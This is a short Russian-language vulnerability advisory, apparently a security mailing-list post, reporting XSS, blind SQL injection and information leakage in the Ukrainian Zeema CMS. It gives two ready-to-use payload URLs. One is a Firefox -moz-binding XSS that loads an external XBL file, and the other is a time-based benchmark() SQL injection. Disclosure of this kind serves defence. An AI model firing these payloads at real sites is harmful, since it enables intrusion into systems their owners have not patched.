XSS, SQLi и IL уязвимости в Zeema CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, SQL Injection и Information Leakage уязвимостях в системе Zeema CMS. Это украинская коммерческая CMS.

XSS (WASC-08):

http://site/counter/?act=ip&ip_addr=%3Cp%20style=-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)%3E

Атака сработает в браузерах Mozilla и Firefox.

SQL Injection (WASC-19):

http://site/counter/?act=ip&ip_addr=%27%20and%20benchmark(10000000,md5(now()))%23

Это blind SQL Injection.

Information Leakage (WASC-13):

Статистика сайта http://site/counter/ находится в публичном доступе (и путь к ней легко узнать).

Уязвимы все версии Zeema CMS.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/5467/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua